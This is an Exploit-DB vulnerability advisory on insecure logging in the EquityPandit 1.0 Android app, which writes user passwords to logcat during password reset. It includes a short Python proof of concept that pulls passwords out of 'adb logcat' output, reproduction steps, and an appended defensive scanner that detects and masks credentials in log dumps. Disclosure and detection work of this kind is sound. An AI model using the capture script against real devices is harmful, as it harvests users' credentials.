
EquityPandit 1.0 - Password Disclosure

28 May 2019 | Reported by ManhNho | Type: exploitdb | Source: www.exploit-db.com

EquityPandit v1.0 - Insecure Logging, Password Disclosure in Android Ap

Code
#Exploit title: EquityPandit v1.0 - Insecure Logging
#Date:27/05/2019
#Exploit Author: ManhNho
#Software name: "EquityPandit"
#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
#Version: 1.0
# Category: Android apps
#Description:

   - Developers sometimes leave sensitive data logged to the developer
   console, so an attacker can easily capture sensitive information such as passwords.
   - In this application, an attacker with adb can capture the password of any
   user via the forgot password function.

#Requirement:

   - Santoku virtual machine
   - Android virtual machine (installed "EquityPandit" apk file)
   - Victim user/password: [email protected]/123456
   - Exploit code named capture.py in Santoku vm as below:

import subprocess
import re

process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
stdout=subprocess.PIPE)
dumps = process_handler.stdout.read()
password_list = re.findall(r'password\s(.*)', dumps)
print 'Captured %i passwords! \nThey are:' %len(password_list)
for index, item in enumerate(password_list):
	print '\t#%i: %s' %(int(index)+1, item)

#Reproduce:

   - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)

adb connect x.x.x.x


   - Step 2: From Android machine, open EquityPandit, click the forgot password
   function for account "[email protected]" and then click submit
   - Step 3: From Santoku, execute capture.py
   - Actual: The password of "[email protected]" will be shown in the terminal as
   "123456"

#Demo:

https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv
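
#Added example (not part of the original advisory or the app's code):

A release-gate check for the insecure-logging issue described above: it scans a captured logcat dump for credential-like fields and reports where they occur with the value masked. The key list, tag names, package name and sample log lines are constructed assumptions, not output from EquityPandit.

```python
import re

# Keys treated as sensitive; this list is an assumption, extend it per app.
SENSITIVE_KEYS = ("password", "passwd", "pwd", "otp", "token", "secret")

# logcat "threadtime" layout: date time pid tid level tag: message
LINE_RE = re.compile(
    r"^\d\d-\d\d \d\d:\d\d:\d\d\.\d+\s+\d+\s+\d+\s+([VDIWEF])\s+(.*?)\s*: (.*)$"
)
# Key, then ':', '=' or whitespace, then a value. Whitespace is accepted
# because the PoC regex on this page matches "password <value>"; expect
# some prose false positives to triage.
LEAK_RE = re.compile(
    r"(?i)\b(" + "|".join(SENSITIVE_KEYS) +
    r")\b[\"']?\s*[:=\s]\s*[\"']?([^\s\"',}&]+)"
)

def mask(value):
    """Keep only the length so the report never stores the secret itself."""
    return "*" * len(value)

def scan_logcat(dump):
    """Return one finding per sensitive key/value pair in a logcat dump."""
    findings = []
    for lineno, line in enumerate(dump.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # skips '--------- beginning of main' and wrapped lines
        level, tag, message = m.groups()
        for key, value in LEAK_RE.findall(message):
            findings.append({"line": lineno, "level": level, "tag": tag,
                             "key": key.lower(), "masked": mask(value)})
    return findings

# Constructed sample dump (hypothetical tags and package name).
SAMPLE_DUMP = """\
--------- beginning of main
05-27 10:15:01.101  2211  2211 I ActivityManager: Displayed com.example.app/.LoginActivity
05-27 10:15:02.345  2211  2250 D ForgotPwdTask: response {"status":"ok","password":"123456"}
05-27 10:15:02.350  2211  2250 D ForgotPwdTask: password 123456
05-27 10:15:03.002  2211  2211 W InputMethod: focus moved to passwordField
05-27 10:15:04.010  2211  2260 D ApiClient: GET /profile?token=abc123&lang=en
"""

if __name__ == "__main__":
    for f in scan_logcat(SAMPLE_DUMP):
        print("line %(line)d [%(level)s/%(tag)s] %(key)s=%(masked)s" % f)
```

Any finding in a test run of a release build means the logging call should be removed or the field redacted before it reaches the log.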
